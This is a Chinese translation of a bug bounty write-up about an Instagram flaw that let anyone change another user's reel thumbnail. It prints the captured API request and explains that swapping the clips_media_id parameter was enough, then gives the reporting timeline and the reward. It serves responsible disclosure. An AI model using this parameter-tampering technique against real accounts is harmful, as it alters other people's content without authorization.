大家好,我是來自印度的 20 歲的安全愛好者 Neeraj Sharma。
Facebook Reels 是一種短視頻。您也可以觀看創作者選擇在Facebook上推薦的Instagram 公開Reels。Reels 是基於可能與您相關的內容進行推薦的,可能會在動態和FacebookWatch 等位置顯示
描述
利用此漏洞,攻擊者可以通過知道該用戶的 clips_media_id(Media ID)來更改任何 Instagram 用戶的reels縮略圖。
那麼我是如何發現這個錯誤的——故事情節
我於 2021 年 12 月開始在 Instagram 應用程序上搜索。最初,我在 Instagram 廣告 GraphQL API 上進行了測試,但經過長時間的搜索,當我在那裡找不到任何漏洞時,我開始在 Instagram reels部分搜索。在花了一些時間研究目標之後,我來到了用戶可以編輯他們的reels封面照片(縮略圖)的地步。為了測試,我改變了我的reels縮略圖。我使用 burp 攔截了所有 HTTP 請求,在轉發一些請求後,我看到了以下 HTTP 請求。
漏洞點:POST /api/v1/media/configure_to_clips_cover_image/ HTTP/2Host: i.instagram.comX-Ig-App-Locale: en_USX-Ig-Device-Locale: en_USX-Ig-Mapped-Locale: en_USX-Pigeon-Session-Id: UFS-76e15775–9d76-xxxx-a9ff-9e773f1434f3–0X-Pigeon-Rawclienttime: 1652xxxxxx.203X-Ig-Bandwidth-Speed-Kbps: 92.000X-Ig-Bandwidth-Totalbytes-B: 524300X-Ig-Bandwidth-Totaltime-Ms: 5673X-Ig-App-Startup-Country: unknownX-Bloks-Version-Id: 74127b75369d49cc521218cd0a1bb32050ad33839d18cexxxxxxe9e414f68a79X-Ig-Www-Claim: hmac.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-KOX-Bloks-Is-Layout-Rtl: falseX-Ig-Device-Id: 8893c680–7663–48a4–95dc-dd91bxxxxxxxX-Ig-Family-Device-Id: 8b068789–1e7a-45a6–8d3c-642edxxxxxxxX-Ig-Android-Id: android-acc0f44381add0deX-Ig-Timezone-Offset: -14400X-Ig-Nav-Chain: MainFeedFragment:feed_timeline:1:cold_start:10#230#301:2763122193696048,SelfFragment:self_profile:2:media_owner::,ClipsProfileTabFragment:clips_profile:3:button::,ClipsViewerFragment:clips_viewer_self_clips_profile:4:button::,ClipsViewerFragment:clips_viewer_self_clips_profile:5:button::,ClipsEditMetadataFragment:clips_editor:6:button::X-Ig-Connection-Type: WIFIX-Ig-Capabilities: 3brTv10=X-Ig-App-Id: 567067343352427Priority: u=3User-Agent: Instagram 226.0.0.16.117 Android (24/7.0; 320dpi; 720x1184; unknown/Android; vbox86p; vbox86; en_US; 356747126)Accept-Language: en-USAuthorization: Bearer IGT:2:<BASE64_Encoded_Token>X-Mid: YnJa7AABAAFBAWyzna1J4pu-Mf2eIg-U-Ig-Direct-Region-Hint: ASH,446xxxxxxx,168xxxxxxx:01f7b979c4246d13c5918e1c108d47035dcd6e26eac03b70a2019c4b49c9361859eb1339Ig-U-Shbid: 12xxx,446149xxxxx,16840xxxxx:01f768439426c8ad997598109a160dd7f2135290feded4dcd1b29a60cedb745fbxxxxxxxIg-U-Shbts: 165xxxxxxx,44614xxxxxx,16840xxxxx:01f78820938f9b9debf2f7e3d89f10ce673aa6d45008e7e9a850989367f753xxxxxxxcccIg-U-Ds-User-Id: 446xxxxxxxxIg-U-Rur: EAG,446xxxxxxxx,1684xxxxxx:01f711fcdae5108f17ec0239b6ef93fabe6befbe65d6e55f0006258ef5afxxxxxxxxxxxxIg-Intended-User-Id: 446xxxxxxxxContent-Type: application/x-www-form-urlencoded; charset=UTF-8Content-Length: 100Accept-Encoding: gzip, deflateX-Fb-Http-Engine: LigerX-Fb-Client-Ip: TrueX-Fb-Server-Cluster: Trueclips_media_id=2763122193610xxxxxx&_uuid=8893c680–7663–48a4–95dc-dd91b9xxxxxx&upload_id=326264xxxxxx
這裡有兩個主要參數:
clips_media_id
上傳 ID
clip_media_id 是Media ID。Upload_id 是我要插入縮略圖的照片。
將此請求發送到Burp的repeater模塊後,然後將我的clips_media_id替換為我的測試reels的media_id並將請求轉發到瀏覽器。令我驚訝的是,用戶永遠無法控制其縮略圖的未經授權的測試reels被更改了。
我再次嘗試使用我的其他帳戶並將clips_media_id替換為我的第二個帳戶 reels ID。而不是我的第一個帳戶reels,第二個帳戶的縮略圖發生了變化。
我很驚訝,因為我沒想到像 META 這樣的巨頭的子公司會出現這種漏洞。我立即將其報告給META團隊。
影響:
此錯誤允許惡意行為者更改 Instagram 上任何reels的縮略圖。要執行此攻擊,只需要目標用戶reels的媒體 ID。
在信息安全CIA三要素中,完整性受到侵犯,攻擊者的行為完全無視受害者的可訪問性。因此考慮到 0 交互和元安全操作的最終影響分析。
Meta 團隊決定獲得 $$$$$ 的巨額獎勵。概括地說,惡意行為者能夠在沒有任何授權或受害者交互的情況下在任何配置文件中偽造縮略圖。這種影響非常廣泛,並且圍繞着大量不同的 Instagram 用戶。
視頻證明:https://youtu.be/1X7I25-rSqE
PS:所有測試都是在我的測試帳戶上完成的 :)
演示結果如下圖
最後,我要感謝 Meta 安全團隊提供的巨額賞金獎勵😊
還要感謝我的朋友Vatsal Vaishy在這篇文章中幫助我 :)
時間線:
2022 年 1 月 31 日:報告已發送
2022 年 2 月 3 日:收到 Meta 安全團隊的回覆以獲取更多信息
2022 年 2 月 8 日:報告分類
2022 年 5 月 11 日:獲得 49500 美元(45000 美元賞金 + 4500 美元獎金)
推薦閱讀:
實戰 | 記一次對鄰居家的滲透測試
實戰 | 記一次賞金20萬美元的PayPal漏洞挖掘
實戰 | 記一次觀看YouTube視頻,收穫一枚價值4300美金的SQL注入
實戰 | WAF-Bypass之SQL注入繞過思路總結
點讚,轉發,在看
原文地址:點擊閱讀原文即可跳轉
由HACK整理翻譯,如需轉載請註明來源
留言列表